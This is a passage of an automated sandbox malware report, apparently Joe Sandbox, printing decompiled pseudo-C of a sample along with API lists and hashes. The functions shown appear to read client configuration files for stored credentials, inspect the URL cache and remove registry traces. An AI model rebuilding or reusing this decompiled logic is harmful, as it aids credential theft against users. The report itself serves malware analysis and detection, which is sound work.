								_push(_t67);
								L10:
								_push(_t47);
								goto L34;
							}
							__eflags = _t67 - 0x11;
							if(_t67 <= 0x11) {
								L40:
								__eflags = _t47 - 0xa1;
								if(_t47 == 0xa1) {
									_push(1);
									_push(_a12);
									_t47 = E0040467E(_a4, _t80, GetWindowThreadProcessId(_a4, 0));
								}
								goto L35;
							}
							__eflags = _t67 - 0x14;
							if(_t67 == 0x14) {
								__eflags = _t47 - 0xa2;
								if(_t47 != 0xa2) {
									L21:
									__eflags = _t47 - 0xa5;
									L22:
									if(__eflags != 0) {
										goto L35;
									}
									goto L61;
								}
								L32:
								_t47 = 0xf060;
								goto L33;
							}
							__eflags = _t67 - 0x15;
							if(_t67 != 0x15) {
								goto L25;
							}
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = 0xf180;
							goto L33;
						}
						if(__eflags == 0) {
							__eflags = _t47 - 0xa2;
							if(_t47 != 0xa2) {
								goto L21;
							}
							_t47 = _a8;
							__eflags =  *(_t47 + 0x24) & 0x00020000;
							if(( *(_t47 + 0x24) & 0x00020000) == 0) {
								goto L35;
							}
							_t47 = 0xf020;
							goto L33;
						}
						__eflags = _t67 - 2;
						if(_t67 == 2) {
							__eflags = _t47 - 0xa3;
							if(_t47 == 0xa3) {
								goto L25;
							}
							__eflags = _t47 - 0xa5;
							if(_t47 == 0xa5) {
								goto L61;
							}
							goto L40;
						}
						__eflags = _t67 - 3;
						if(_t67 == 3) {
							__eflags = _t47 - 0xa3;
							if(_t47 != 0xa3) {
								__eflags = _t47 - 0xa5;
								if(_t47 == 0xa5) {
									goto L61;
								}
								__eflags = _t47 - 0xa1;
								goto L22;
							}
							goto L32;
						}
						__eflags = _t67 - 5;
						if(_t67 == 5) {
							__eflags = _t47 - 0xa1;
							if(_t47 != 0xa1) {
								__eflags = _t47 - 0xa0;
								if(_t47 != 0xa0) {
									goto L35;
								}
								_push(0);
								_push(0xfffffffe);
								L28:
								_push( *((intOrPtr*)(_t80 + 8)));
								goto L34;
							}
							_push(0);
							_push(0xffffffff);
							goto L28;
						}
						__eflags = _t67 - 6 - 1;
						if(_t67 - 6 > 1) {
							goto L25;
						}
						__eflags = _t47 - 0xa1;
						if(_t47 == 0xa1) {
							_push(1);
							_push(0);
							E0040467E(_a4, _t80, GetWindowThreadProcessId(_a4, 0));
							_t47 = _a20;
							_t67 = _v8;
							goto L25;
						}
						__eflags = _t47 - 0xa2;
						if(_t47 == 0xa2) {
							goto L25;
						}
						__eflags = _t47 - 0xa3;
						if(_t47 == 0xa3) {
							goto L25;
						}
						__eflags = _t47 - 0xa0;
						if(_t47 == 0xa0) {
							goto L25;
						}
						goto L21;
					}
					_t58 = E0041B6E8(0, _t80, 0);
					_push(_a24);
					_push(_t58 & 0xffff);
					_t47 = E0040480E(_t80, _t80, _a4, _a16);
					goto L10;
				}
			}

0x004048ed
0x004048f0
0x004048f4
0x004048f7
0x004048ff
0x0040491c
0x00404924
0x00000000
0x00000000
0x00404926
0x00404941
0x00404949
0x0040495f
0x00000000
0x00000000
0x00000000
0x00000000
0x00404965
0x00404965
0x00404965
0x0040497b
0x00404983
0x0040498a
0x004049b8
0x004049bd
0x004049c0
0x004049c3
0x00404ada
0x00404add
0x00404b22
0x00404b27
0x00404b52
0x00404b57
0x00404a71
0x00404a75
0x00404a75
0x00404b5d
0x00404b5f
0x00404b5f
0x00404b62
0x00000000
0x00000000
0x00404b68
0x00404b6b
0x00404a60
0x00404a60
0x00404a66
0x00404a67
0x00404a6c
0x00404a6f
0x00000000
0x00404a6f
0x00404b71
0x00404b71
0x00404b74
0x00404b77
0x00000000
0x00404b77
0x00404b2c
0x00404b2f
0x00404b34
0x00000000
0x00000000
0x00404b41
0x00404b4d
0x00000000
0x00404b4d
0x00404adf
0x00404a2e
0x00404a2e
0x00404a31
0x004049ac
0x004049ac
0x00000000
0x004049ac
0x00404ae5
0x00404ae8
0x00404a9c
0x00404a9c
0x00404aa1
0x00404aa6
0x00404aa8
0x00404ab5
0x00404ab5
0x00000000
0x00404aa1
0x00404aea
0x00404aed
0x00404b0d
0x00404b12
0x00404a06
0x00404a06
0x00404a0b
0x00404a0b
0x00000000
0x00000000
0x00000000
0x00404a0d
0x00404a5b
0x00404a5b
0x00000000
0x00404a5b
0x00404aef
0x00404af2
0x00000000
0x00000000
0x00404af8
0x00404afd
0x00000000
0x00000000
0x00404b03
0x00000000
0x00404b03
0x004049c9
0x00404abc
0x00404ac1
0x00000000
0x00000000
0x00404ac7
0x00404aca
0x00404ad1
0x00000000
0x00000000
0x00404ad3
0x00000000
0x00404ad3
0x004049cf
0x004049d2
0x00404a8a
0x00404a8f
0x00000000
0x00000000
0x00404a91
0x00404a96
0x00000000
0x00000000
0x00000000
0x00404a96
0x004049d8
0x004049db
0x00404a54
0x00404a59
0x00404a78
0x00404a7d
0x00000000
0x00000000
0x00404a83
0x00000000
0x00404a83
0x00000000
0x00404a59
0x004049dd
0x004049e0
0x00404a37
0x00404a3c
0x00404a47
0x00404a4c
0x00000000
0x00000000
0x00404a4e
0x00404a50
0x00404a42
0x00404a42
0x00000000
0x00404a42
0x00404a3e
0x00404a40
0x00000000
0x00404a40
0x004049e5
0x004049e8
0x00000000
0x00000000
0x004049ea
0x004049ef
0x00404a15
0x00404a17
0x00404a23
0x00404a28
0x00404a2b
0x00000000
0x00404a2b
0x004049f1
0x004049f6
0x00000000
0x00000000
0x004049f8
0x004049fd
0x00000000
0x00000000
0x004049ff
0x00404a04
0x00000000
0x00000000
0x00000000
0x00404a04
0x00404992
0x00404997
0x004049a0
0x004049a7
0x00000000
0x004049a7

APIs

GetAncestor.USER32(?,00000002), ref: 00404916
SendMessageTimeoutW.USER32 ref: 00404941
PostMessageW.USER32(?,00000020,?,00000000), ref: 00404983
GetWindowThreadProcessId.USER32(?,00000000), ref: 00404A1C
PostMessageW.USER32(?,00000112,?,?), ref: 00404A6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00404AAE

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Message$PostProcessThreadWindow$AncestorSendTimeout
String ID:
API String ID: 1223205383-0
Opcode ID: 8f8dce49bab290af14fabe4dd2d35767f322bd330d9ed23787210d3127b5841f
Instruction ID: abe0a3757bce22ffd62c690e83ced2e36ccb7740db713f73a708bc35c4790f01
Opcode Fuzzy Hash: 8f8dce49bab290af14fabe4dd2d35767f322bd330d9ed23787210d3127b5841f
Instruction Fuzzy Hash: C851A0B5780204AAEF304A58CD85BBF3664EB85350F240437FB41F66E1C27DDD90AA6E

Uniqueness

Uniqueness Score: -1.00%

Function 0041790F Relevance: 9.2, APIs: 6, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0041790F(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				short _v524;
				short _v528;
				char _v568;
				short _v584;
				char _v596;
				short _v600;
				char _v608;
				short _v612;
				char _v616;
				short _v620;
				char _v624;
				short _v628;
				short* _v632;
				WCHAR* _v636;
				WCHAR* _v640;
				WCHAR* _v644;
				WCHAR* _v648;
				WCHAR* _v652;
				void* __edi;
				void* __esi;
				WCHAR* _t54;
				WCHAR* _t57;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t70;
				WCHAR* _t73;
				WCHAR* _t74;
				long _t78;
				int _t81;
				long _t85;
				long _t88;
				WCHAR* _t89;
				void* _t90;
				WCHAR* _t94;
				WCHAR* _t95;
				WCHAR* _t112;
				WCHAR* _t113;
				WCHAR* _t118;
				intOrPtr _t127;
				signed int _t128;
				void* _t130;

				_t130 = (_t128 & 0xfffffff8) - 0x284;
				if(E0040DFC5( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L21:
					return 1;
				}
				_t133 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_t118 = E0040865F(0x1fffe);
					_v628 = _t118;
					__eflags = _t118;
					if(_t118 == 0) {
						goto L21;
					}
					_t54 = GetPrivateProfileStringW(0, 0, 0, _t118, 0xffff,  &_v524);
					__eflags = _t54;
					if(_t54 <= 0) {
						L20:
						E0040868F(_t118);
						goto L21;
					}
					_t9 =  &(_t54[0]); // 0x1
					_t57 = E004095C6(_t118, _t9);
					__eflags = _t57;
					if(_t57 == 0) {
						goto L20;
					}
					_t112 = E0040865F(0xc1c);
					_v640 = _t112;
					__eflags = _t112;
					if(_t112 != 0) {
						_t11 =  &(_t112[0x1fe]); // 0x3fc
						_v632 =  &(_t11[0xff]);
						_v644 = _t118;
						_t62 = 0x48;
						E00412F05(_t62,  &_v584);
						_t64 = 0x49;
						E00412F05(_t64,  &_v596);
						_t66 = 0x4a;
						E00412F05(_t66,  &_v608);
						_t68 = 0x4b;
						E00412F05(_t68,  &_v624);
						_t70 = 0x4c;
						E00412F05(_t70,  &_v616);
						goto L9;
						L18:
						_t74 = E00409604(_v648, 1);
						_v652 = _t74;
						__eflags = _t74;
						if(_t74 != 0) {
							_t112 = _v644;
							L9:
							_t73 = StrStrIW(_v644,  &_v584);
							__eflags = _t73;
							if(_t73 == 0) {
								_t78 = GetPrivateProfileStringW(_v648,  &_v600, 0, _t112, 0xff,  &_v528);
								__eflags = _t78;
								if(_t78 > 0) {
									_t81 = GetPrivateProfileIntW(_v648,  &_v612, 0x15,  &_v528);
									_v640 = _t81;
									__eflags = _t81 - 1 - 0xfffe;
									if(_t81 - 1 <= 0xfffe) {
										_t113 =  &(_t112[0xff]);
										_t85 = GetPrivateProfileStringW(_v648,  &_v628, 0, _t113, 0xff,  &_v528);
										__eflags = _t85;
										if(_t85 > 0) {
											_t33 =  &(_t113[0xff]); // 0x0
											_t125 = _t33;
											_t88 = GetPrivateProfileStringW(_v648,  &_v620, 0, _t33, 0xff,  &_v528);
											__eflags = _t88;
											if(_t88 > 0) {
												_t89 = E00409301(_t125);
												__eflags = _t89;
												if(_t89 > 0) {
													_t126 =  &_v568;
													_t90 = 0x2b;
													E00412F05(_t90,  &_v568);
													_push(_v640);
													_t38 =  &(_t113[0xff]); // 0x0
													_push(_v644);
													_push(_t113);
													_t114 = _v636;
													_t94 = E00409450(_t126, 0x311, _v636, _t126);
													_t130 = _t130 + 0x14;
													__eflags = _t94;
													if(_t94 > 0) {
														_t127 = _a4;
														_t95 = E00408A85(_t94, _t127, _t114);
														__eflags = _t95;
														if(_t95 != 0) {
															_t42 = _t127 + 4;
															 *_t42 =  &(( *(_t127 + 4))[0]);
															__eflags =  *_t42;
														}
													}
												}
											}
										}
									}
								}
							}
							goto L18;
						}
						E0040868F(_v644);
						_t118 = _v636;
					}
					goto L20;
				} else {
					E004178D7(_t133,  &_v524, _a4);
					goto L21;
				}
			}

0x00417915
0x00417933
0x00417b2e
0x00417b36
0x00417b36
0x00417939
0x0041793c
0x0041795d
0x00417961
0x00417965
0x00417967
0x00000000
0x00000000
0x00417984
0x00417986
0x00417988
0x00417b28
0x00417b29
0x00000000
0x00417b29
0x0041798e
0x00417993
0x00417998
0x0041799a
0x00000000
0x00000000
0x004179aa
0x004179ac
0x004179b0
0x004179b2
0x004179b8
0x004179c5
0x004179c9
0x004179d1
0x004179d2
0x004179dd
0x004179de
0x004179e9
0x004179ea
0x004179f5
0x004179f6
0x00417a01
0x00417a02
0x00417a07
0x00417b04
0x00417b0a
0x00417b0f
0x00417b13
0x00417b15
0x00417a09
0x00417a0d
0x00417a16
0x00417a1c
0x00417a1e
0x00417a3e
0x00417a40
0x00417a42
0x00417a5b
0x00417a61
0x00417a66
0x00417a6b
0x00417a7a
0x00417a8c
0x00417a8e
0x00417a90
0x00417a9b
0x00417a9b
0x00417aad
0x00417aaf
0x00417ab1
0x00417ab5
0x00417aba
0x00417abc
0x00417ac0
0x00417ac4
0x00417ac5
0x00417aca
0x00417ace
0x00417ad4
0x00417ade
0x00417adf
0x00417ae6
0x00417aeb
0x00417aee
0x00417af0
0x00417af2
0x00417af8
0x00417afd
0x00417aff
0x00417b01
0x00417b01
0x00417b01
0x00417b01
0x00417aff
0x00417af0
0x00417abc
0x00417ab1
0x00417a90
0x00417a6b
0x00417a42
0x00000000
0x00417a1e
0x00417b1f
0x00417b24
0x00417b24
0x00000000
0x0041793e
0x00417949
0x00000000
0x00417949

APIs

Part of subcall function 0040DFC5: PathCombineW.SHLWAPI(?,?,?,0041A149,?,004218C8,00000000,00000032,?), ref: 0040DFE5

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00417984
StrStrIW.SHLWAPI(?,?), ref: 00417A16
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00417A3E
GetPrivateProfileIntW.KERNEL32 ref: 00417A5B
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00417A8C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: PrivateProfile$String$CombinePath
String ID:
API String ID: 2134968610-0
Opcode ID: 41e3c1d75c642563a958bcad19c0509b1f724a4c9330977e2c46e590001befa2
Instruction ID: 75196bd634bc75fe1479f35f9d84abbe6afd491c18dbbec2ff4531613b5a9be2
Opcode Fuzzy Hash: 41e3c1d75c642563a958bcad19c0509b1f724a4c9330977e2c46e590001befa2
Instruction Fuzzy Hash: EF51B972508306ABD710EB61CD45EEB77F9EF85708F00092EB984E3291DB78E945C79A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F689 Relevance: 9.2, APIs: 6, Instructions: 155
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F689(void* __eflags, char* _a4, struct _GOPHER_FIND_DATAA _a8, struct _GOPHER_FIND_DATAA _a12, struct _GOPHER_FIND_DATAA _a16) {
				char _v5;
				char _v12;
				signed int _v16;
				char _v20;
				char _v24;
				long _v28;
				void* __edi;
				void* __esi;
				signed int _t55;
				void* _t58;
				struct _GOPHER_FIND_DATAA _t59;
				intOrPtr _t60;
				struct _GOPHER_FIND_DATAA _t61;
				struct _GOPHER_FIND_DATAA _t62;
				signed int _t71;
				struct _GOPHER_FIND_DATAA _t79;
				struct _GOPHER_FIND_DATAA _t84;
				int _t89;
				struct _GOPHER_FIND_DATAA _t91;
				void* _t96;
				intOrPtr* _t100;
				struct _GOPHER_FIND_DATAA _t104;
				struct _GOPHER_FIND_DATAA _t108;

				_v16 = _v16 | 0xffffffff;
				EnterCriticalSection(0x421210);
				_t100 = _a4;
				_t55 = E0040EEF3( *_t100);
				if(_t55 == 0xffffffff) {
					L35:
					LeaveCriticalSection(0x421210);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x421228;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L35;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t104 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E00409B07(0x2000, 0x1000);
									}
									__eflags = _a12 - _t104;
									if(_a12 < _t104) {
										_t104 = _a12;
									}
									__eflags = _a8;
									if(_a8 != 0) {
										E004086CB(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t104);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t104;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t104;
								}
								_v16 = 1;
							}
						}
						goto L34;
					}
					LeaveCriticalSection(0x421210);
					_v5 = E0040F570( &_v20, __eflags,  *_t100,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x421210);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t106 =  *_a4;
					_t71 = E0040EEF3( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E0040868F(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x421228;
					_t102 = E0040A7CC( &_v24, _t106);
					_t79 = E004126FA( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E0040868F(_t102);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E004088D2(_v24, 0, _t102);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t108 = E0040865F(0x1000);
					__eflags = _t108;
					if(_t108 == 0) {
						L18:
						E0040868F(_a4);
						goto L19;
					}
					 *_t108 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t108,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t108 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0040D8AB(_t91, _v12, _v20);
							}
						}
					}
					E0040868F(_t108);
					goto L18;
				} else {
					 *_t100 =  *((intOrPtr*)(_t96 + 0x20));
					L34:
					goto L35;
				}
			}

0x0040f68f
0x0040f69a
0x0040f6a0
0x0040f6a5
0x0040f6ad
0x0040f85b
0x0040f860
0x0040f86c
0x0040f86c
0x0040f6bc
0x0040f6c2
0x00000000
0x00000000
0x0040f6c9
0x0040f6cf
0x0040f6e3
0x0040f6e6
0x0040f6e8
0x0040f6ea
0x0040f6ea
0x0040f6ea
0x0040f6ed
0x0040f6f1
0x0040f7fc
0x0040f7fc
0x0040f7ff
0x0040f802
0x0040f804
0x0040f808
0x0040f80a
0x0040f80a
0x0040f80d
0x0040f80f
0x0040f811
0x0040f815
0x0040f826
0x0040f826
0x0040f829
0x0040f82c
0x0040f82e
0x0040f82e
0x0040f831
0x0040f835
0x0040f842
0x0040f847
0x0040f847
0x0040f847
0x0040f847
0x0040f835
0x0040f84a
0x0040f84d
0x0040f84f
0x0040f851
0x0040f851
0x0040f853
0x0040f853
0x0040f808
0x00000000
0x0040f802
0x0040f6ff
0x0040f719
0x0040f71c
0x0040f722
0x0040f726
0x0040f7ed
0x0040f7ed
0x0040f7ed
0x0040f7ed
0x0040f7f6
0x00000000
0x0040f7f6
0x0040f72f
0x0040f731
0x0040f736
0x0040f739
0x0040f7e8
0x00000000
0x0040f7e8
0x0040f74c
0x0040f756
0x0040f764
0x0040f769
0x0040f76b
0x0040f7d1
0x0040f7d2
0x0040f7da
0x0040f7e0
0x00000000
0x0040f7e0
0x0040f773
0x0040f778
0x0040f77b
0x0040f77d
0x00000000
0x00000000
0x0040f784
0x0040f78c
0x0040f78e
0x0040f790
0x0040f7c9
0x0040f7cc
0x00000000
0x0040f7cc
0x0040f79a
0x0040f7a0
0x0040f7a6
0x0040f7a8
0x0040f7aa
0x0040f7ad
0x0040f7af
0x0040f7b1
0x0040f7b5
0x0040f7be
0x0040f7be
0x0040f7b5
0x0040f7af
0x0040f7c4
0x00000000
0x0040f6d9
0x0040f6dc
0x0040f85a
0x00000000
0x0040f85a

APIs

EnterCriticalSection.KERNEL32(00421210), ref: 0040F69A
LeaveCriticalSection.KERNEL32(00421210), ref: 0040F6FF
EnterCriticalSection.KERNEL32(00421210), ref: 0040F71C
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0040F7A0
SetLastError.KERNEL32(00002EE4), ref: 0040F7F6
LeaveCriticalSection.KERNEL32(00421210), ref: 0040F860

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: bb5e870957749941b9c7e75fa3132c64d039927c28064a5d0351a1d1bccba805
Instruction ID: 56a24ef2da0a18b1d56d5ef0b0c2492ae5cecac36b90cb8e68282a59f4ab7d7d
Opcode Fuzzy Hash: bb5e870957749941b9c7e75fa3132c64d039927c28064a5d0351a1d1bccba805
Instruction Fuzzy Hash: F3516031900209ABCF20EF65C885B9E7BB4AF04724F14857AF814FB2E1D778D955CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417518 Relevance: 9.1, APIs: 6, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00417518(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t49;
				void* _t51;
				void* _t53;
				void* _t55;
				void* _t57;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t84;
				WCHAR* _t85;
				WCHAR* _t87;
				intOrPtr _t97;
				void* _t98;

				_t82 = __edx;
				_t40 = E0040865F(0x1fffe);
				_t87 = _t40;
				_v20 = _t87;
				if(_t87 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t87, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E0040868F(_t87);
				}
				_t3 = _t41 + 1; // 0x1
				if(E004095C6(_t87, _t3) == 0) {
					goto L17;
				}
				_t84 = E0040865F(0xc08);
				_v12 = _t84;
				if(_t84 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t84[0x1fe]); // 0x3fc
					_v16 =  &(_t5[0xff]);
					_v8 = _t87;
					_t49 = 0x3b;
					E00412F05(_t49,  &_v112);
					_t51 = 0x3c;
					E00412F05(_t51,  &_v48);
					_t53 = 0x3d;
					E00412F05(_t53,  &_v32);
					_t55 = 0x3e;
					E00412F05(_t55,  &_v88);
					_t57 = 0x3f;
					E00412F05(_t57,  &_v68);
					goto L6;
					L15:
					_t61 = E00409604(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t84 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t84, 0xff, _a4) > 0) {
								_t85 =  &(_t84[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t85, 0xff, _a4) > 0) {
									_t26 =  &(_t85[0xff]); // 0x0
									_t95 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) > 0 && E004173AC(_t82, _t95) > 0) {
										_t96 =  &_v144;
										_t72 = 0x2c;
										E00412F05(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t85[0xff]); // 0x0
										_push(_t85);
										_t86 = _v16;
										_t82 = 0x307;
										_t76 = E00409450(_t96, 0x307, _v16, _t96);
										_t98 = _t98 + 0x10;
										if(_t76 > 0) {
											_t97 = _a8;
											if(E00408A85(_t76, _t97, _t86) != 0) {
												 *((intOrPtr*)(_t97 + 4)) =  *((intOrPtr*)(_t97 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E0040868F(_v12);
						_t87 = _v20;
						goto L17;
					}
				}
			}

0x00417518
0x00417529
0x0041752e
0x00417532
0x00417537
0x004176bd
0x004176bd
0x0041754f
0x00417553
0x004176b3
0x00000000
0x004176b4
0x00417559
0x00417565
0x00000000
0x00000000
0x00417575
0x00417577
0x0041757c
0x00000000
0x00417582
0x00417582
0x0041758f
0x00417592
0x00417598
0x00417599
0x004175a3
0x004175a4
0x004175ae
0x004175af
0x004175b9
0x004175ba
0x004175c4
0x004175c5
0x004175ca
0x00417693
0x00417698
0x0041769d
0x004176a2
0x004175cc
0x004175cf
0x004175e0
0x004175ed
0x004175f1
0x00417616
0x0041762b
0x00417634
0x00417634
0x00417645
0x00417653
0x00417659
0x0041765a
0x0041765f
0x00417662
0x00417669
0x0041766a
0x00417670
0x00417675
0x0041767a
0x0041767f
0x00417681
0x0041768e
0x00417690
0x00417690
0x0041768e
0x0041767f
0x00417645
0x0041762b
0x004175f1
0x00000000
0x004176a8
0x004176ab
0x004176b0
0x00000000
0x004176b0
0x004176a2

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0041754F

Part of subcall function 0040865F: HeapAlloc.KERNEL32(00000008,?,0040BDA9,?,?,00409CD2,?,?,?,0040527C,00000000,?), ref: 00408670

StrStrIW.SHLWAPI(?,?), ref: 004175DC
StrStrIW.SHLWAPI(?,?), ref: 004175ED
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00417609
GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00417627
GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00417641

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 1411b0bea012219d7f1f168eeebac1167820cad70dbdb0b684bef1cf9ab76347
Instruction ID: fe224c7a7130cb5d6ae8486c6cdafc930dcda211616299e1b24ebe0565ad659b
Opcode Fuzzy Hash: 1411b0bea012219d7f1f168eeebac1167820cad70dbdb0b684bef1cf9ab76347
Instruction Fuzzy Hash: B741A032D0061AFADB10ABA6CD01EEEBB7AEF44754F114026F904F3252DB789E418798

Uniqueness

Uniqueness Score: -1.00%

Function 00414860 Relevance: 9.1, APIs: 6, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00414860(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E0041A0E0(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0041A0E0(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x421868 =  *0x421868 | 0x00000002;
				_push(0);
				E00413DAA();
				E00405488(_t46, _t65);
				E0040DDAD( &_v1680, _t65);
				E0040DDAD(_t51, _t65);
				_t52 =  &_v2720;
				E0041A0E0(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				E00412ECF(0xaa,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00409494( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E0040A154(__ebx, 0x474,  &_v1168);
				}
				if( *0x421d30 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x00414860
0x00414860
0x00414870
0x00414877
0x00414885
0x00414889
0x00414890
0x00414898
0x0041489a
0x004148a1
0x004148a3
0x004148a8
0x004148b4
0x004148bb
0x004148c2
0x004148c9
0x004148d6
0x004148f2
0x00414901
0x00414903
0x0041490c
0x00414915
0x0041491d
0x00414922
0x0041492a
0x00414944
0x00414949
0x00414949
0x00414955
0x00414959
0x00414959
0x00414966

APIs

Part of subcall function 0041A0E0: PathRenameExtensionW.SHLWAPI(?,.dat,?,004218C8,00000000,00000032,?), ref: 0041A159

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00414885
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00414898

Part of subcall function 00413DAA: SetEvent.KERNEL32(004148A8,00000000), ref: 00413DB0
Part of subcall function 00413DAA: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00413DC3

Part of subcall function 00405488: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220823,?,00000000), ref: 004054C7
Part of subcall function 00405488: Sleep.KERNEL32(000001F4), ref: 004054D6
